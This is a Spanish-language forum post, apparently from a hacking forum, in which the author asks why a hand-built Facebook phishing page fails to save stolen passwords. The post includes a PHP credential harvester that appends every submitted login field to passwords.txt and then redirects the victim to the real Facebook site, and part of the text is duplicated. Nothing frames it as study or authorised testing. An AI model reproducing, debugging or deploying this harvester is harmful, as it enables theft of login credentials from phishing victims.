Buenas, intento probar un fake para pishing, de forma manual (no SET).
El action fue editado para redirigir al code.php, el code.php incluye el siguiente codigo:
Aunque tambien intente sin https (con http).
en el server estan el index.html, el code.php y el passwords.txt, ingreso user y pass,me reenvia a la web legitima pero sin guardar el pass.
Alguna idea? . gracias,saludos.
El action fue editado para redirigir al code.php, el code.php incluye el siguiente codigo:
Código (php) [Seleccionar]
<?php
header ('Location:https://he-il.facebook.com/');
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Aunque tambien intente sin https (con http).
en el server estan el index.html, el code.php y el passwords.txt, ingreso user y pass,me reenvia a la web legitima pero sin guardar el pass.
Alguna idea? . gracias,saludos.